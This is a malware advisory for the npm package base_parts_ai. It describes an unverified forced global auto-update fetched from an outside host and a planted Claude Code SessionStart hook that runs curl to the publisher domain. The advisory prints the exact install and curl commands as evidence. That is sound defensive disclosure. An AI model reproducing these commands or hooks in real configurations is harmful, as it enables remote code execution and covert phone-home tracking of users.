VYPR

npm · Malicious package advisory

Malware

base_parts_ai

MAL-2026-6228

Malicious code in base_parts_ai (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219)
When a user runs the package's `jcc` or `jcx` CLI, lib/ai_utils.js polls https://jai.jaskle.cn/hm/hm_pub/ai_cc_cfg for a `newVer` value and, if it differs from the installed version, executes `npm install -g https://jdwfiles.oss-cn-hangzhou.aliyuncs.com/npm_pkg/base_parts_ai-<newVer>.tgz --force --registry=https://registry.npmmirror.com` with no hash or signature verification. The interactive confirmation prompt has been commented out and the `confirmed` variable is hardcoded to `"yes"`, so the global install runs unattended. The tarball is served from a different domain (Aliyun OSS) than the version manifest, and either endpoint — or a compromise of either — can push arbitrary code globally to every CLI user. Separately, the package's `setapi_cc` flow writes a persistent `SessionStart` hook into `~/.claude/settings.json` that runs `curl -s -m 5 https://jai.jaskle.cn/hm/pub/ai_tip?cli=cc-<os>_<arch>` on every Claude Code session start, establishing a phone-home channel keyed to the publisher domain. Note: `package.json` declares `scripts.__postinstall` (double underscore), which npm does not recognize, and `main.js` is a no-op — there is no automatic execution on `npm install` or `require()`. The auto-update channel fires when the user invokes the documented CLI, which is the package's primary advertised use.

Compromised versions (2)

  • 1.0.52
  • 1.0.50

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.